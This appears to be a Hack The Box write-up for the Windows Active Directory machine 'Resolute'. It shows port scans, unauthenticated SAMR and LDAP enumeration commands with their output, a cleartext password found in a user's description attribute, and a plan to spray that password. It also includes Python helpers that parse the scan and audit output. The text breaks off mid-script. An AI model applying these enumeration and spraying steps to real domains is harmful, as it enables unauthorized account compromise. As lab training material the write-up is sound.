This Hack The Box machine is built on the Windows operating system and revolves around Active Directory, LDAP and bad practices. A great thing about this machine, just like other similar ones, is that it can be very close to real life. Active Directory is used across many enterprise environments as their credential backbone, and it is a service that can allow different types of attacks if it is not set up correctly.
Resolute required a good amount of enumeration even after you gain access to the system. Along with this (spoiler, I know), one finding that leads to privilege escalation is a specific group membership. Some HTB users went for that other approach; I went in a different direction.
For people not well versed in Active Directory and Windows, and even if you are, there is some reading to do, or at least I recommend doing so, which is why I've added some resources below along with links to some tools.
Some great resources around this are below:
Resources:
Let's get started!
Initial Enumeration: Footprinting and Scanning
First off, we need to identify how to reach the system. In other words, we need to identify which services this machine exposes.
Let's start by adding this machine's IP address to the hosts file and creating an alias:
My go-to tools in this phase, which many people typically use to start enumerating, are:
masscan: a very nice port scanning tool that finds open ports quickly. To me this is a tool to narrow down the scope of the enumeration, so we can focus on open ports only when using nmap.
Here, I am designating the interface to use when communicating with the HTB machine (-e), which will be the HTB VPN interface, along with -p to designate the port range to target (I will target ALL TCP and UDP ports), and the transmission rate in packets per second (--rate).
Similar to this, you could also run something like this:
nmap -p- --min-rate=1000 -T4 resolute.htb
nmap: I think most people in the information technology and security space know what nmap does. It is a very versatile port scanning tool which also lets you use scripts to further probe the services found. Like anything, it can be a useful tool while it can also be damaging if the user is not careful.
What I typically start with when using nmap is:
-sC: to use all default non-intrusive nmap scripts on each service
-sV: to get the service version information which is definitely important for us
-p: to designate the port we will be targeting
-vvv: for extended verbosity (I like as many details as I can get)
MASSCAN
root@kali:~/Documents/HTB-Labs/Resolute# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.169 --rate=1000 > Resolute_masscan.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-07 15:52:46 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 51883/udp on 10.10.10.169
Discovered open port 49664/tcp on 10.10.10.169
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 59104/tcp on 10.10.10.169
Discovered open port 63464/udp on 10.10.10.169
Discovered open port 59146/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Discovered open port 49670/tcp on 10.10.10.169
Discovered open port 3269/tcp on 10.10.10.169
Discovered open port 49666/tcp on 10.10.10.169
Discovered open port 49667/tcp on 10.10.10.169
Discovered open port 53379/udp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 47001/tcp on 10.10.10.169
Discovered open port 49676/tcp on 10.10.10.169
Discovered open port 49665/tcp on 10.10.10.169
Discovered open port 59188/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 56251/udp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 3268/tcp on 10.10.10.169
Discovered open port 9389/tcp on 10.10.10.169
Discovered open port 49909/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 5985/tcp on 10.10.10.169
Discovered open port 49688/tcp on 10.10.10.169
As you can see, we found some UDP high ports that we do not see a use for at the moment. Below is an example of how you can filter these out and create a usable list that makes our lives easier. If you compare that output with the list of ports I used in nmap, they are not in the same order; the list below is laid out for your benefit.
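As an added example (not from the original post), the following script does that filtering: it parses the masscan log, keeps the ports per host and per protocol, and builds the nmap port spec so that UDP-only ports are not handed to a TCP scan, which is why several high ports show up as "closed" in the nmap output further down. The masscan lines in the sample are a constructed subset of the output above.

```python
"""Turn a masscan log into per-protocol port lists for a follow-up nmap scan.

Added example, not code from the original post. masscan reports TCP and UDP
hits in one stream; feeding the UDP ports to a TCP-only nmap scan just yields
'closed' results, so the list is split by protocol before building the command.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the masscan lines shown in the write-up.
SAMPLE_LOG = """\
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-07 15:52:46 GMT
Discovered open port 51883/udp on 10.10.10.169
Discovered open port 49664/tcp on 10.10.10.169
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 63464/udp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 5985/tcp on 10.10.10.169
"""

LINE_RE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)$")


def parse_masscan(text):
    """Return {host: {"tcp": [ports], "udp": [ports]}} with sorted, unique ports."""
    found = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banner, 'forced options' and other non-result lines
        port, proto, host = int(m.group(1)), m.group(2), m.group(3)
        found[host][proto].add(port)
    return {h: {p: sorted(s) for p, s in protos.items()} for h, protos in found.items()}


def nmap_port_spec(ports):
    """Build nmap's -p argument, e.g. 'T:88,445,U:53'; empty protocols are skipped."""
    parts = []
    if ports["tcp"]:
        parts.append("T:" + ",".join(map(str, ports["tcp"])))
    if ports["udp"]:
        parts.append("U:" + ",".join(map(str, ports["udp"])))
    return ",".join(parts)


def nmap_command(host, ports, include_udp=False):
    """Return the nmap command line for the host.

    UDP ports are only included when include_udp is set, and then -sU is added,
    because nmap ignores a U: list unless a UDP scan type is requested.
    """
    tcp = ports["tcp"]
    udp = ports["udp"] if include_udp else []
    spec = nmap_port_spec({"tcp": tcp, "udp": udp})
    scan_types = "-sS -sU" if udp else "-sS"
    return f"nmap {scan_types} -sC -sV -p {spec} {host}"


if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_LOG).items():
        print(host, "tcp:", ports["tcp"], "udp:", ports["udp"])
        print(nmap_command("resolute.htb", ports))
        print(nmap_command("resolute.htb", ports, include_udp=True))
```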
root@kali:~/Documents/HTB-Labs/Resolute# nmap -sC -sV -vvv -p51883,49664,445,59104,63464,59146,464,49670,3269,49666,49667,53379,636,53,49677,593,47001,49676,49665,59188,135,56251,389,88,3268,9389,49909,139,5985,49688 resolute.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 21:52 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating Ping Scan at 21:52
Scanning resolute.htb (10.10.10.169) [4 ports]
Completed Ping Scan at 21:52, 0.14s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:52
Scanning resolute.htb (10.10.10.169) [30 ports]
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 3269/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 3268/tcp on 10.10.10.169
Discovered open port 49667/tcp on 10.10.10.169
Discovered open port 49666/tcp on 10.10.10.169
Discovered open port 49665/tcp on 10.10.10.169
Discovered open port 49676/tcp on 10.10.10.169
Discovered open port 9389/tcp on 10.10.10.169
Discovered open port 49688/tcp on 10.10.10.169
Discovered open port 47001/tcp on 10.10.10.169
Discovered open port 49664/tcp on 10.10.10.169
Discovered open port 5985/tcp on 10.10.10.169
Completed SYN Stealth Scan at 21:52, 0.27s elapsed (30 total ports)
Initiating Service scan at 21:52
Scanning 21 services on resolute.htb (10.10.10.169)
Completed Service scan at 21:53, 55.78s elapsed (21 services on 1 host)
NSE: Script scanning 10.10.10.169.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 15.59s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:53
NSE Timing: About 97.02% done; ETC: 21:53 (0:00:01 remaining)
NSE Timing: About 98.21% done; ETC: 21:54 (0:00:01 remaining)
NSE Timing: About 99.40% done; ETC: 21:54 (0:00:01 remaining)
Completed NSE at 21:55, 120.53s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
Nmap scan report for resolute.htb (10.10.10.169)
Host is up, received echo-reply ttl 127 (0.12s latency).
Scanned at 2020-01-07 21:52:15 EST for 192s
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-08 02:59:21Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp closed unknown reset ttl 127
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49688/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49909/tcp closed unknown reset ttl 127
51883/tcp closed unknown reset ttl 127
53379/tcp closed unknown reset ttl 127
56251/tcp closed unknown reset ttl 127
59104/tcp closed unknown reset ttl 127
59146/tcp closed unknown reset ttl 127
59188/tcp closed unknown reset ttl 127
63464/tcp closed unknown reset ttl 127
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=5E1543EA%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h47m00s, deviation: 4h37m10s, median: 6m59s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36199/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55070/udp): CLEAN (Timeout)
| Check 4 (port 13498/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-01-07T19:00:15-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-08T03:00:16
|_ start_date: 2020-01-08T01:35:15
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.81 seconds
Raw packets sent: 34 (1.472KB) | Rcvd: 31 (1.312KB)
As you can see from the open ports found, the following are very important:
-> Kerberos: 88/tcp Microsoft Windows Kerberos
-> DNS: 53/tcp (I scanned TCP 53 only, instead of both TCP and UDP 53)
-> LDAP: 389/tcp Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
-> SMB: 445/tcp Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
-> LDAPS: 636/tcp
-> Windows Remote Management (WinRM): 5985/tcp Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Along with these, given that RPC and dynamic RPC (on the TCP high ports) are available, SAMR is also available to us. Why is this important? Well, SAMR, the Security Account Manager Remote Protocol (RPC over SMB), could potentially allow account enumeration with no authentication. That's a big deal, especially when Microsoft recommends having this locked down (see Resource #5).
With that said, let's move forward with Impacket's samrdump script to get user account information. This step gives you a lot of good information, and we could end up using it for things like a user list.
SAMRDUMP
root@kali:~/Documents/HTB-Labs/Resolute# /opt/impacket/examples/samrdump.py -dc-ip resolute.htb -target-ip resolute.htb megabank.local/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Retrieving endpoint list from megabank.local/
Found domain(s):
. MEGABANK
. Builtin
[*] Looking up users in domain MEGABANK
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: DefaultAccount, uid = 503
Found user: ryan, uid = 1105
Found user: marko, uid = 1111
Found user: sunita, uid = 6601
Found user: abigail, uid = 6602
Found user: marcus, uid = 6603
Found user: sally, uid = 6604
Found user: fred, uid = 6605
Found user: angela, uid = 6606
Found user: felicia, uid = 6607
Found user: gustavo, uid = 6608
Found user: ulf, uid = 6609
Found user: stevie, uid = 6610
Found user: claire, uid = 6611
Found user: paulo, uid = 6612
Found user: steve, uid = 6613
Found user: annette, uid = 6614
Found user: annika, uid = 6615
Found user: per, uid = 6616
Found user: claude, uid = 6617
Found user: melanie, uid = 10101
Found user: zach, uid = 10102
Found user: simon, uid = 10103
Found user: naoki, uid = 10104
Administrator (500)/FullName:
Administrator (500)/UserComment:
Administrator (500)/PrimaryGroupId: 513
Administrator (500)/BadPasswordCount: 0
Administrator (500)/LogonCount: 62
Administrator (500)/PasswordLastSet: 2020-01-07 22:24:03.081350
Administrator (500)/PasswordDoesNotExpire: True
Administrator (500)/AccountIsDisabled: False
Administrator (500)/ScriptPath:
Guest (501)/FullName:
Guest (501)/UserComment:
Guest (501)/PrimaryGroupId: 514
Guest (501)/BadPasswordCount: 0
Guest (501)/LogonCount: 0
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
Guest (501)/ScriptPath:
krbtgt (502)/FullName:
krbtgt (502)/UserComment:
krbtgt (502)/PrimaryGroupId: 513
krbtgt (502)/BadPasswordCount: 0
krbtgt (502)/LogonCount: 0
krbtgt (502)/PasswordLastSet: 2019-09-25 09:29:12.154667
krbtgt (502)/PasswordDoesNotExpire: False
krbtgt (502)/AccountIsDisabled: True
krbtgt (502)/ScriptPath:
DefaultAccount (503)/FullName:
DefaultAccount (503)/UserComment:
DefaultAccount (503)/PrimaryGroupId: 513
DefaultAccount (503)/BadPasswordCount: 0
DefaultAccount (503)/LogonCount: 0
DefaultAccount (503)/PasswordLastSet: <never>
DefaultAccount (503)/PasswordDoesNotExpire: True
DefaultAccount (503)/AccountIsDisabled: True
DefaultAccount (503)/ScriptPath:
ryan (1105)/FullName: Ryan Bertrand
ryan (1105)/UserComment:
ryan (1105)/PrimaryGroupId: 513
ryan (1105)/BadPasswordCount: 0
ryan (1105)/LogonCount: 0
ryan (1105)/PasswordLastSet: 2020-01-07 22:24:02.409469
ryan (1105)/PasswordDoesNotExpire: True
ryan (1105)/AccountIsDisabled: False
ryan (1105)/ScriptPath:
marko (1111)/FullName: Marko Novak
marko (1111)/UserComment:
marko (1111)/PrimaryGroupId: 513
marko (1111)/BadPasswordCount: 0
marko (1111)/LogonCount: 0
marko (1111)/PasswordLastSet: 2019-09-27 09:17:14.569061
marko (1111)/PasswordDoesNotExpire: True
marko (1111)/AccountIsDisabled: False
marko (1111)/ScriptPath:
sunita (6601)/FullName:
sunita (6601)/UserComment:
sunita (6601)/PrimaryGroupId: 513
sunita (6601)/BadPasswordCount: 0
sunita (6601)/LogonCount: 0
sunita (6601)/PasswordLastSet: 2019-12-03 16:26:29.108327
sunita (6601)/PasswordDoesNotExpire: False
sunita (6601)/AccountIsDisabled: False
sunita (6601)/ScriptPath:
abigail (6602)/FullName:
abigail (6602)/UserComment:
abigail (6602)/PrimaryGroupId: 513
abigail (6602)/BadPasswordCount: 0
abigail (6602)/LogonCount: 0
abigail (6602)/PasswordLastSet: 2019-12-03 16:27:30.936946
abigail (6602)/PasswordDoesNotExpire: False
abigail (6602)/AccountIsDisabled: False
abigail (6602)/ScriptPath:
marcus (6603)/FullName:
marcus (6603)/UserComment:
marcus (6603)/PrimaryGroupId: 513
marcus (6603)/BadPasswordCount: 0
marcus (6603)/LogonCount: 0
marcus (6603)/PasswordLastSet: 2019-12-03 16:27:59.256272
marcus (6603)/PasswordDoesNotExpire: False
marcus (6603)/AccountIsDisabled: False
marcus (6603)/ScriptPath:
sally (6604)/FullName:
sally (6604)/UserComment:
sally (6604)/PrimaryGroupId: 513
sally (6604)/BadPasswordCount: 0
sally (6604)/LogonCount: 0
sally (6604)/PasswordLastSet: 2019-12-03 16:28:29.622615
sally (6604)/PasswordDoesNotExpire: False
sally (6604)/AccountIsDisabled: False
sally (6604)/ScriptPath:
fred (6605)/FullName:
fred (6605)/UserComment:
fred (6605)/PrimaryGroupId: 513
fred (6605)/BadPasswordCount: 0
fred (6605)/LogonCount: 0
fred (6605)/PasswordLastSet: 2019-12-03 16:29:01.882442
fred (6605)/PasswordDoesNotExpire: False
fred (6605)/AccountIsDisabled: False
fred (6605)/ScriptPath:
angela (6606)/FullName:
angela (6606)/UserComment:
angela (6606)/PrimaryGroupId: 513
angela (6606)/BadPasswordCount: 0
angela (6606)/LogonCount: 0
angela (6606)/PasswordLastSet: 2019-12-03 16:29:43.451148
angela (6606)/PasswordDoesNotExpire: False
angela (6606)/AccountIsDisabled: False
angela (6606)/ScriptPath:
felicia (6607)/FullName:
felicia (6607)/UserComment:
felicia (6607)/PrimaryGroupId: 513
felicia (6607)/BadPasswordCount: 0
felicia (6607)/LogonCount: 0
felicia (6607)/PasswordLastSet: 2019-12-03 16:30:53.545222
felicia (6607)/PasswordDoesNotExpire: False
felicia (6607)/AccountIsDisabled: False
felicia (6607)/ScriptPath:
gustavo (6608)/FullName:
gustavo (6608)/UserComment:
gustavo (6608)/PrimaryGroupId: 513
gustavo (6608)/BadPasswordCount: 0
gustavo (6608)/LogonCount: 0
gustavo (6608)/PasswordLastSet: 2019-12-03 16:31:42.082567
gustavo (6608)/PasswordDoesNotExpire: False
gustavo (6608)/AccountIsDisabled: False
gustavo (6608)/ScriptPath:
ulf (6609)/FullName:
ulf (6609)/UserComment:
ulf (6609)/PrimaryGroupId: 513
ulf (6609)/BadPasswordCount: 0
ulf (6609)/LogonCount: 0
ulf (6609)/PasswordLastSet: 2019-12-03 16:32:19.957565
ulf (6609)/PasswordDoesNotExpire: False
ulf (6609)/AccountIsDisabled: False
ulf (6609)/ScriptPath:
stevie (6610)/FullName:
stevie (6610)/UserComment:
stevie (6610)/PrimaryGroupId: 513
stevie (6610)/BadPasswordCount: 0
stevie (6610)/LogonCount: 0
stevie (6610)/PasswordLastSet: 2019-12-03 16:33:13.438134
stevie (6610)/PasswordDoesNotExpire: False
stevie (6610)/AccountIsDisabled: False
stevie (6610)/ScriptPath:
claire (6611)/FullName:
claire (6611)/UserComment:
claire (6611)/PrimaryGroupId: 513
claire (6611)/BadPasswordCount: 0
claire (6611)/LogonCount: 0
claire (6611)/PasswordLastSet: 2019-12-03 16:33:44.808450
claire (6611)/PasswordDoesNotExpire: False
claire (6611)/AccountIsDisabled: False
claire (6611)/ScriptPath:
paulo (6612)/FullName:
paulo (6612)/UserComment:
paulo (6612)/PrimaryGroupId: 513
paulo (6612)/BadPasswordCount: 0
paulo (6612)/LogonCount: 0
paulo (6612)/PasswordLastSet: 2019-12-03 16:34:46.745427
paulo (6612)/PasswordDoesNotExpire: False
paulo (6612)/AccountIsDisabled: False
paulo (6612)/ScriptPath:
steve (6613)/FullName:
steve (6613)/UserComment:
steve (6613)/PrimaryGroupId: 513
steve (6613)/BadPasswordCount: 0
steve (6613)/LogonCount: 0
steve (6613)/PasswordLastSet: 2019-12-03 16:35:25.125917
steve (6613)/PasswordDoesNotExpire: False
steve (6613)/AccountIsDisabled: False
steve (6613)/ScriptPath:
annette (6614)/FullName:
annette (6614)/UserComment:
annette (6614)/PrimaryGroupId: 513
annette (6614)/BadPasswordCount: 0
annette (6614)/LogonCount: 0
annette (6614)/PasswordLastSet: 2019-12-03 16:36:55.592358
annette (6614)/PasswordDoesNotExpire: False
annette (6614)/AccountIsDisabled: False
annette (6614)/ScriptPath:
annika (6615)/FullName:
annika (6615)/UserComment:
annika (6615)/PrimaryGroupId: 513
annika (6615)/BadPasswordCount: 0
annika (6615)/LogonCount: 0
annika (6615)/PasswordLastSet: 2019-12-03 16:37:23.666378
annika (6615)/PasswordDoesNotExpire: False
annika (6615)/AccountIsDisabled: False
annika (6615)/ScriptPath:
per (6616)/FullName:
per (6616)/UserComment:
per (6616)/PrimaryGroupId: 513
per (6616)/BadPasswordCount: 0
per (6616)/LogonCount: 0
per (6616)/PasswordLastSet: 2019-12-03 16:38:12.278673
per (6616)/PasswordDoesNotExpire: False
per (6616)/AccountIsDisabled: False
per (6616)/ScriptPath:
claude (6617)/FullName:
claude (6617)/UserComment:
claude (6617)/PrimaryGroupId: 513
claude (6617)/BadPasswordCount: 0
claude (6617)/LogonCount: 0
claude (6617)/PasswordLastSet: 2019-12-03 16:39:56.407621
claude (6617)/PasswordDoesNotExpire: False
claude (6617)/AccountIsDisabled: False
claude (6617)/ScriptPath:
melanie (10101)/FullName:
melanie (10101)/UserComment:
melanie (10101)/PrimaryGroupId: 513
melanie (10101)/BadPasswordCount: 0
melanie (10101)/LogonCount: 0
melanie (10101)/PasswordLastSet: 2020-01-07 22:24:03.065711
melanie (10101)/PasswordDoesNotExpire: False
melanie (10101)/AccountIsDisabled: False
melanie (10101)/ScriptPath:
zach (10102)/FullName:
zach (10102)/UserComment:
zach (10102)/PrimaryGroupId: 513
zach (10102)/BadPasswordCount: 0
zach (10102)/LogonCount: 0
zach (10102)/PasswordLastSet: 2019-12-04 05:39:27.835093
zach (10102)/PasswordDoesNotExpire: False
zach (10102)/AccountIsDisabled: False
zach (10102)/ScriptPath:
simon (10103)/FullName:
simon (10103)/UserComment:
simon (10103)/PrimaryGroupId: 513
simon (10103)/BadPasswordCount: 0
simon (10103)/LogonCount: 0
simon (10103)/PasswordLastSet: 2019-12-04 05:39:58.563443
simon (10103)/PasswordDoesNotExpire: False
simon (10103)/AccountIsDisabled: False
simon (10103)/ScriptPath:
naoki (10104)/FullName:
naoki (10104)/UserComment:
naoki (10104)/PrimaryGroupId: 513
naoki (10104)/BadPasswordCount: 0
naoki (10104)/LogonCount: 0
naoki (10104)/PasswordLastSet: 2019-12-04 05:40:44.342485
naoki (10104)/PasswordDoesNotExpire: False
naoki (10104)/AccountIsDisabled: False
naoki (10104)/ScriptPath:
[*] Received 27 entries.
As mentioned, from this information I created my user list to hold on to, but we need to move on and see what else we can get without credentials.
Let's move to LDAP. With LDAP, we can try ldapsearch and ldapdomaindump. The latter generates several files that present the information in a more readable form.
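The samrdump output above is also worth reading with an auditor's eye: Administrator, ryan and marko are enabled accounts whose passwords never expire. As an added example (not from the original post), this script groups samrdump's "user (rid)/Attribute: value" lines per account, extracts the user list, and flags the account settings a domain review would question. The sample input is a constructed subset of the output above.

```python
"""Extract the user list and flag weak account settings in samrdump output.

Added example, not code from the original post. samrdump prints one
'user (rid)/Attribute: value' line per attribute; this groups them per account
and reports enabled accounts with non-expiring passwords, enabled built-in
accounts and enabled accounts that never had a password set.
"""
import re

# Constructed sample: a subset of the attribute lines in the write-up's output.
SAMPLE_SAMRDUMP = """\
[*] Looking up users in domain MEGABANK
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: ryan, uid = 1105
Found user: sunita, uid = 6601
Administrator (500)/FullName:
Administrator (500)/PasswordLastSet: 2020-01-07 22:24:03.081350
Administrator (500)/PasswordDoesNotExpire: True
Administrator (500)/AccountIsDisabled: False
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
ryan (1105)/FullName: Ryan Bertrand
ryan (1105)/PasswordDoesNotExpire: True
ryan (1105)/AccountIsDisabled: False
sunita (6601)/PasswordDoesNotExpire: False
sunita (6601)/AccountIsDisabled: False
[*] Received 4 entries.
"""

FOUND_RE = re.compile(r"^Found user: (\S+), uid = (\d+)$")
ATTR_RE = re.compile(r"^(\S+) \((\d+)\)/(\w+): ?(.*)$")


def list_users(text):
    """Return the usernames from the 'Found user:' lines, in output order."""
    return [m.group(1) for line in text.splitlines() if (m := FOUND_RE.match(line))]


def parse_samrdump(text):
    """Return {username: {"rid": int, <Attribute>: value, ...}} from attribute lines."""
    accounts = {}
    for line in text.splitlines():
        m = ATTR_RE.match(line)
        if not m:
            continue  # 'Found user' lines, banners and status lines
        name, rid, attr, value = m.groups()
        acct = accounts.setdefault(name, {"rid": int(rid)})
        if value in ("True", "False"):  # samrdump prints Python bools as text
            value = value == "True"
        acct[attr] = value
    return accounts


def audit_accounts(accounts):
    """Return (username, finding) tuples for enabled accounts with weak settings."""
    findings = []
    for name, a in sorted(accounts.items(), key=lambda kv: kv[1]["rid"]):
        enabled = not a.get("AccountIsDisabled", False)
        if not enabled:
            continue
        if a.get("PasswordDoesNotExpire"):
            findings.append((name, "enabled account with a non-expiring password"))
        if a["rid"] in (500, 501):  # built-in Administrator / Guest RIDs
            findings.append((name, "built-in account is enabled"))
        if a.get("PasswordLastSet") == "<never>":
            findings.append((name, "enabled account that never had a password set"))
    return findings


if __name__ == "__main__":
    print("users:", ", ".join(list_users(SAMPLE_SAMRDUMP)))
    for user, finding in audit_accounts(parse_samrdump(SAMPLE_SAMRDUMP)):
        print(f"{user}: {finding}")
```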
LDAPSEARCH
Dumping LDAP information unauthenticated, focusing on the findings, as there is a lot we can get from a domain.
root@kali:~/Documents/HTB-Labs/Resolute# ldapsearch -x -h resolute.htb -b "dc=megabank,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=megabank,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# megabank.local
dn: DC=megabank,DC=local
.
.
.
# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Marko Novak
sn: Novak
description: Account created. Password set to Welcome123!
givenName: Marko
distinguishedName: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,D
C=local
instanceType: 4
whenCreated: 20190927131714.0Z
whenChanged: 20191203132427.0Z
displayName: Marko Novak
uSNCreated: 13110
uSNChanged: 69792
name: Marko Novak
objectGUID:: 8oIRSXQNmEW4iTLjzuwCpw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132140638345690606
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWVwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: marko
sAMAccountType: 805306368
userPrincipalName: marko@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927131714.0Z
dSCorePropagationData: 16010101000001.0Z
.
.
.
As you can see, we can focus on Marko, as a potential password was added to that user's Description attribute. That password is Welcome123!.
When we try it with smbclient, which will not be a focus here, we find that the password does not work for the user marko, but it has to mean something or be useful somewhere.
Let's try "password spraying" this password against the user list we created from samrdump, relying on ldapdomaindump. I used this tool to test the password because we might as well; if it succeeds, we can leverage the data we get at the same time.
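A password in the Description attribute is the kind of finding a domain owner can hunt for themselves in an LDIF export. As an added example (not from the original post), this script parses ldapsearch LDIF output like the one above, handling the folded continuation lines (see the wrapped distinguishedName on marko) and base64 ("::") values, and reports entries whose description, info or comment attribute mentions a password. The sample LDIF is constructed from the marko entry above; the svc-demo entry and its base64 description are invented for the example.

```python
"""Hunt for credentials left in free-text attributes of an LDIF export.

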